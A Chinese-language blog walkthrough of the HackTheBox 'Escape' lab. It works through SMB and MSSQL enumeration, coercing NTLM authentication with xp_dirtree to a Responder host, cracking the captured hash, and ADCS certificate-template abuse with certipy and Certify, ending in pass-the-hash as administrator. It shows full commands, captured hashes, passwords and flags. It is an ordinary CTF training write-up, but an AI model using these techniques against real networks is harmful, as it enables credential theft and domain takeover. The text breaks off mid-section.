HackTheBox Escape [Net-NTLMv2 + ADCS + PTH + Silver Ticket]

Posted on Edited on In , , , Views: Word count in article: 6.4k Reading time ≈ 23 mins.

简述

本文是medium难度的HTB Escape机器的域渗透部分,其中Net-NTLMv2, ADCS, PTH, Silver Ticket等域渗透细节是此box的特色,主要参考0xdf’s blog Escape walkthroughHTB’s official Escape walkthrough记录这篇博客加深记忆和理解,及供后续做深入研究查阅,备忘。

信息收集

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
nmap -p- --min-rate 10000 10.10.11.202
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49668/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49708/tcp open  unknown
49712/tcp open  unknown
63474/tcp open  unknown

看起来是Windows域控制器,基于标准的Windows,如SMB(445)、NetBIOS(135/139)、LDAP(389等)和WinRM(5985),以及通常在dc上的53 (DNS)和88 (Kerberos)。还有一个MSSQL服务器(1433)。

nmap运行LDAP脚本显示了sequel.htb的域名。TLS证书是针对dc.sequel.htb的。添加这些,以及主机名dc到/etc/hosts文件:

1
10.10.11.202    dc.sequel.htb sequel.htb dc

最后,注意到这个服务器上的时钟与本地时钟相差8个小时。需要同步它来做Kerberos操作。

TLS证书

深入地研究使用中的TLS证书,使用openssl将其拉出并格式化:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# openssl s_client -showcerts -connect 10.10.11.202:3269  | openssl x509 -noout -text
Can't use SSL_get_servername
depth=0 CN = dc.sequel.htb
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN = dc.sequel.htb
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 CN = dc.sequel.htb
verify return:1
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            1e:00:00:00:04:90:52:7b:fc:91:38:74:2f:00:00:00:00:00:04
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: DC = htb, DC = sequel, CN = sequel-DC-CA
        Validity
            Not Before: Nov 18 21:20:35 2022 GMT
            Not After : Nov 18 21:20:35 2023 GMT
        Subject: CN = dc.sequel.htb
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:a6:92:78:aa:2e:fe:07:2f:e4:d9:88:f2:d4:9f:
                    37:64:9d:73:fe:ca:4e:ef:85:bd:b5:46:70:3d:f8:
                    2f:98:38:f4:28:17:f8:15:1d:c8:37:d1:ad:2e:08:
                    d5:5f:a0:87:c1:3b:5e:cf:c9:1d:97:6b:5c:e7:c1:
                    c1:f2:8f:41:e2:6c:9a:2a:3c:e1:2a:64:57:d7:47:
                    98:69:27:b4:89:c4:f9:7d:95:28:2c:3c:42:53:3e:
                    28:bb:f7:db:b4:cd:c0:52:d3:c4:5c:a0:68:92:e0:
                    67:8b:ec:7c:c0:cd:97:a5:45:d1:ce:75:d6:3c:bd:
                    f0:a9:01:6c:07:dd:69:32:e6:f5:67:3f:ca:99:ec:
                    b7:11:98:31:4f:8d:cf:74:f6:38:09:92:70:0e:fa:
                    48:51:e5:e0:db:dd:c7:1b:5a:ff:c8:ca:97:df:50:
                    19:e1:e3:cb:78:d6:03:a5:8c:e8:7c:a8:38:0b:92:
                    bf:da:66:8d:fb:04:d3:67:5b:7a:01:18:aa:01:60:
                    50:af:11:51:4c:7e:af:4c:ea:13:e8:d1:7e:e8:7c:
                    40:2d:71:71:c5:6c:3f:ec:ea:df:27:85:a5:e5:8e:
                    6e:8b:51:f9:bd:64:b5:7a:b9:d5:3c:4f:7c:6a:22:
                    63:7b:70:79:99:3b:0f:73:3c:3b:a0:a0:45:11:db:
                    33:45
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            1.3.6.1.4.1.311.20.2:
                . .D.o.m.a.i.n.C.o.n.t.r.o.l.l.e.r
            X509v3 Extended Key Usage:
                TLS Web Client Authentication, TLS Web Server Authentication
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            S/MIME Capabilities:
......0...`.H.e...*0...`.H.e...-0...`.H.e....0...`.H.e....0...+....0
..*.H..
            X509v3 Subject Key Identifier:
                22:E2:60:5F:A1:1E:F7:90:9E:56:2A:7B:95:BB:4C:0E:DE:6C:58:87
            X509v3 Authority Key Identifier:
                62:9F:32:A3:A0:F0:38:20:D4:60:C0:CD:6D:C5:FA:51:30:5E:C3:15
            X509v3 CRL Distribution Points:
                Full Name:
                  URI:ldap:///CN=sequel-DC-CA,CN=dc,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?certificateRevocationList?base?objectClass=cRLDistributionPoint
            Authority Information Access:
                CA Issuers - URI:ldap:///CN=sequel-DC-CA,CN=AIA,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?cACertificate?base?objectClass=certificationAuthority
            X509v3 Subject Alternative Name:
                othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        92:e4:4b:28:07:bc:2f:a3:51:de:8c:0f:4e:e7:ea:f3:7e:fd:
        56:c4:6e:88:fe:fb:6a:9a:51:98:eb:5d:c6:49:7f:6e:2d:f3:
        91:13:8b:11:26:c0:ff:b1:8e:cb:ee:c3:c8:af:c5:5f:8e:ac:
        f1:19:b2:2a:49:ed:cc:0f:8f:17:9d:45:cc:23:a5:e5:f2:ab:
        bf:85:b3:36:51:f5:0f:d0:c2:03:06:87:0a:56:08:b5:60:fd:
        ee:c8:f4:78:84:39:1b:bf:69:c1:f9:00:83:ac:5e:9d:28:4c:
        1e:cd:f6:b3:02:7e:b0:88:b3:72:80:53:df:74:a7:25:7e:26:
        1c:df:b1:e5:63:26:28:97:98:a7:a2:be:fb:cb:26:e9:27:c1:
        89:ae:95:a9:e5:78:e6:52:5a:59:63:72:45:d6:cf:6f:6b:9c:
        a4:1f:38:33:35:08:93:7b:b1:6a:0d:18:df:87:de:15:65:43:
        32:62:84:cf:2a:9b:d3:4e:d4:f2:e2:9e:95:24:3c:0a:b9:26:
        8b:ec:3a:fa:fb:e5:93:af:22:04:9b:11:ad:21:63:bb:48:a1:
        07:68:13:06:d9:31:23:02:40:37:4e:4a:5a:48:e9:f8:c9:81:
        ed:74:bc:26:69:fd:85:20:48:bf:1b:82:dc:ed:b4:21:98:37:
        dd:8b:2a:b4

read:errno=104

注意颁发证书的证书颁发机构sequel-DC-CA。

SMB - TCP 445

List

使用crackmapexec访问SMB

1
2
3
4
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# crackmapexec smb 10.10.11.202 --shares
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

使用任何用户名和空密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# crackmapexec smb 10.10.11.202 -u fdnotreallyausername -p '' --shares
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\fdnotreallyausername:
SMB         10.10.11.202    445    DC               [+] Enumerated shares
SMB         10.10.11.202    445    DC               Share           Permissions     Remark
SMB         10.10.11.202    445    DC               -----           -----------     ------
SMB         10.10.11.202    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.202    445    DC               C$                              Default share
SMB         10.10.11.202    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.202    445    DC               NETLOGON                        Logon server share
SMB         10.10.11.202    445    DC               Public          READ
SMB         10.10.11.202    445    DC               SYSVOL                          Logon server share

Public

能访问的唯一共享是Public。使用-N为空密码,将pdf文件下载下来:

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# smbclient //10.10.11.202/Public -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1470835 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (8.3 KiloBytes/sec) (average 8.3 KiloBytes/sec)

SQL Server Procedures.pdf

这个文档只有一页多一点,里面有连接到MSSQL的信息:

1
user PublicUser and password GuestUserCantWrite1

该用户名/密码无法通过WinRM进行连接。

MSSQL

通过这些creds,可以连接到MSSQL服务器。使用Impacket工具mssqlclient.py, 该服务器上有四个数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# mssqlclient.py sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> select name from master..sysdatabases;
name

--------------------------------------------------------------------------------------------------------------------------------

master

tempdb

model

msdb

SQL>

额外枚举

现在还可以做更多枚举:

  • 检查DNS是否存在区域传输/暴力破解子域。
  • 枚举LDAP,包含和不包含密码。
  • 用密码来运行Bloodhound。
  • 使用密码进行Kerberoast。
  • 通过Kerberos强制使用用户名/密码。

目前为止提示(域名、文档讨论的是MSSQL的事实),沿着这个方向,如果需要的话,还会再次枚举。

Shell as sql_svc

运行命令失败

尝试的第一件事是使用xp_cmdshell存储过程通过MSSQL服务器运行命令。但是失败了:

1
2
SQL> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

尝试启用它(正如在scramble的Alternative Roots中所示),但这个帐户没有权限:

1
2
SQL> EXECUTE sp_configure 'show advanced options', 1
[-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.

获取Net-NTLMv2

数据库中没有有用的数据,不能运行命令。接下来要尝试的是让SQL服务器连接回我的主机并进行身份验证,并捕获可以尝试暴力破解的challenge/response。在QuerierGetting Creds via NTLMv2中都展示了这一点。

在这里启动Responder作为root监听tun0接口的一堆服务

唯一关心的是SMB。现在告诉MSSQL读取主机上共享的文件:

1
SQL> EXEC xp_dirtree '\\10.10.16.2\share', 1, 1

没有返回任何东西,但在Responder有一个”hash”:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.2]
    Responder IPv6             [dead:beef:4::1000]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-H6VOL0QMDH2]
    Responder Domain Name      [ZXWC.LOCAL]
    Responder DCE-RPC Port     [49831]

[+] Listening for events...

[!] Error starting TCP server on port 53, check permissions or other servers running.
[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:a052ed0636102870:E34517E6D5F61D5423F401D9A35B8AE0:010100000000000000FA92A342A2D901C3A576838D8EBA6E00000000020008005A0058005700430001001E00570049004E002D004800360056004F004C00300051004D0044004800320004003400570049004E002D004800360056004F004C00300051004D004400480032002E005A005800570043002E004C004F00430041004C00030014005A005800570043002E004C004F00430041004C00050014005A005800570043002E004C004F00430041004C000700080000FA92A342A2D9010600040002000000080030003000000000000000000000000030000012E38F1D56C0404175A7C4C531D6164BC569F5ABDD833B040000C1B5F25101B90A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0032000000000000000000

破解Net-NTLMv2 hash

用hashcat破解。自动检测模式找到5600的哈希类型:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
hashcat.exe -m 5600 password.txt rockyou.txt

Approaching final keyspace - workload adjusted.

sql_svc::sequel:a052ed0636102870:E34517E6D5F61D5423F401D9A35B8AE0:010100000000000000FA92A342A2D901C3A576838D8EBA6E00000000020008005A0058005700430001001E00570049004E002D004800360056004F004C00300051004D0044004800320004003400570049004E002D004800360056004F004C00300051004D004400480032002E005A005800570043002E004C004F00430041004C00030014005A005800570043002E004C004F00430041004C00050014005A005800570043002E004C004F00430041004C000700080000FA92A342A2D9010600040002000000080030003000000000000000000000000030000012E38F1D56C0404175A7C4C531D6164BC569F5ABDD833B040000C1B5F25101B90A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0032000000000000000000:REGGIE1234ronnie

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:a052ed0636102870:e34517e6d5f61d5423...000000
Time.Started.....: Mon Jun 19 12:21:19 2023 (1 sec)
Time.Estimated...: Mon Jun 19 12:21:20 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18688.5 kH/s (4.62ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Speed.#3.........:   447.9 kH/s (9.23ms) @ Accel:16 Loops:1 Thr:64 Vec:1
Speed.#*.........: 19136.3 kH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 12910592/14344386 (90.00%)
Rejected.........: 0/12910592 (0.00%)
Restore.Point....: 9633792/14344386 (67.16%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: benbaay -> 2322434917
Candidates.#3....: 2229sr -> 2129
Hardware.Mon.#1..: Temp: 53c Util: 23% Core:1245MHz Mem:6000MHz Bus:8
Hardware.Mon.#3..: N/A

Started: Mon Jun 19 12:20:58 2023
Stopped: Mon Jun 19 12:21:21 2023
  • 密码为: REGGIE1234ronnie

WINRM

有了这个密码,可以使用Evil-WinRM获得sql_svc的shell:

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc

Shell as Ryan.Cooper

Enumeration

文件系统

sql_svc的home目录基本上是空的。Ryan.Cooper是主机上唯一一个拥有home目录的用户:

1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\users> ls


    Directory: C:\users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:58 AM                Administrator
d-r---        7/20/2021  12:23 PM                Public
d-----         2/1/2023   6:37 PM                Ryan.Cooper
d-----         2/7/2023   8:10 AM                sql_svc

在C盘的根目录下,Public和SQLServer文件夹是不常见的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/1/2023   8:15 PM                PerfLogs
d-r---         2/6/2023  12:08 PM                Program Files
d-----       11/19/2022   3:51 AM                Program Files (x86)
d-----       11/19/2022   3:51 AM                Public
d-----         2/1/2023   1:02 PM                SQLServer
d-r---         2/1/2023   1:55 PM                Users
d-----         2/6/2023   7:21 AM                Windows

Public只有SQL Server PRocedures.pdf文件。

SQLServer安装如下:

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\SQLServer> ls

    Directory: C:\SQLServer

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:06 AM                Logs
d-----       11/18/2022   1:37 PM                SQLEXPR_2019
-a----       11/18/2022   1:35 PM        6379936 sqlexpress.exe
-a----       11/18/2022   1:36 PM      268090448 SQLEXPR_x64_ENU.exe

logs目录下有一个文件

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\SQLServer\Logs> ls

    Directory: C:\SQLServer\Logs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

ERRORLOG.BAK

该文件包含来自SQL服务器的日志:

1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
        Sep 24 2019 13:48:23
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)

2022-11-18 13:43:05.97 Server      UTC adjustment: -8:00
2022-11-18 13:43:05.97 Server      (c) Microsoft Corporation.
2022-11-18 13:43:05.97 Server      All rights reserved.
2022-11-18 13:43:05.97 Server      Server process ID is 3788.
2022-11-18 13:43:05.97 Server      System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'.
2022-11-18 13:43:05.97 Server      Authentication mode is MIXED.
...[snip]...

在日志的最后,有这些信息:

1
2
3
4
5
...[snip]...
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
...[snip]...

看起来像Ryan.Cooper可能输错了密码,他输入的密码是”NuclearMosquito3”作为用户名。如果Ryan在登录时按enter而不是tab键,就可能发生这种情况。

WinRM

使用该密码用winrm连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# evil-winrm -i 10.10.11.202 -u ryan.cooper -p NuclearMosquito3

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cat ../Desktop/user.txt
47e8a7ffa5ff5b79ea0eeb5906ec2a46

Shell as administrator

Enumeration

确认 ADCS

在Windows域上总是需要枚举的一件事是查找Active Directory证书服务(ADCS)。检查这一点的一个快速方法是使用crackmapexec(它可以作为sql_svc或Ryan.Cooper用户):

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# crackmapexec ldap 10.10.11.202 -u ryan.cooper -p NuclearMosquito3 -M adcs
SMB         10.10.11.202    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.202    636    DC               [+] sequel.htb\ryan.cooper:NuclearMosquito3
ADCS                                                Found PKI Enrollment Server: dc.sequel.htb
ADCS                                                Found CN: sequel-DC-CA

与之前发现的CA相同

识别易受攻击模板

随着ADCS的运行,下一个问题是这个ADCS中是否有任何不安全模板配置。为了进一步枚举,通过从SharpCollection下载一个Certify并将其上传到Escape:

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\programdata> upload Certify.exe

Info: Uploading /root/hackthebox/machine/escape/Certify.exe to C:\programdata\Certify.exe

Data: 236884 bytes of 236884 bytes copied

Info: Upload successful!

Certify的README介绍了如何列举和滥用证书服务。首先,显示运行Certify.exe find /vulnerable 默认,这将查看标准低权限组。或加上 /currentuser来跨组查找当前用户,这两种方法都可以。

在打印有关企业CA的一些信息后,列出一个易受攻击的证书模板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
*Evil-WinRM* PS C:\programdata> .\Certify.exe find /vulnerable /currentuser

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using current user's unrolled group SIDs for vulnerability checks.
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.7916004

这里的危险在sequel\Domain Users拥有证书注册权限(这是Certify README文件中的场景3)

滥用模板

方法1: certipy

确实可以看到,实际上存在一个名为UserAuthentication的易受攻击的模板。特别,可以看到经过Authenticated Users可以注册此模板,并且由于msPKI-Certificate-Name-Flag存在并且包含ENROLLEE_SUPPLIES_SUBJECT,因此该模板容易受到Investigating Certificate Template Enrollment Attacks – (ADCS)攻击。本质上讲,这允许任何人注册该模板并指定任意主题替代名称。这意味着,可以通过利用此攻击路径作为域管理员进行身份验证。

为了利用这一点,使用certipy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ntpdate -u dc.sequel.htb
2023-06-19 09:28:43.681199 (-0400) +1.777965 +/- 0.337931 dc.sequel.htb 10.10.11.202 s1 no-leap
CLOCK: time stepped by 1.777965

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-DC-CA -template UserAuthentication
Certipy v4.4.0 - by Oliver Lyak (ly4k)op

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

  • 注意: 如果出现”The NETBIOS connection with the remote host timed out.”错误。请重新执行命令

现在有了administrator的证书,可以再次使用certipy来获得Ticket Granting Ticket (TGT),并提取该用户的NT hash。由于这一步需要一些Kerberos交互,因此需要将时钟同步到远程机器的时间,然后才能继续。

1
2
3
4
5
6
7
8
9
10
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

最后,可以通过WinRM PTH并作为管理员用户进行身份验证。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ls
 administrator.ccache   administrator.pfx   Certify.exe  'SQL Server Procedures.pdf'

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# evil-winrm -i sequel.htb -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
427e2e823cf867a7a25b8f6d9943be9b

方法2: Certify + Rubeus

可以继续使用README场景3,接下来运行Certify.exe以请求具有管理员替代名称的证书。它返回一个cert.pem:

1
2
3
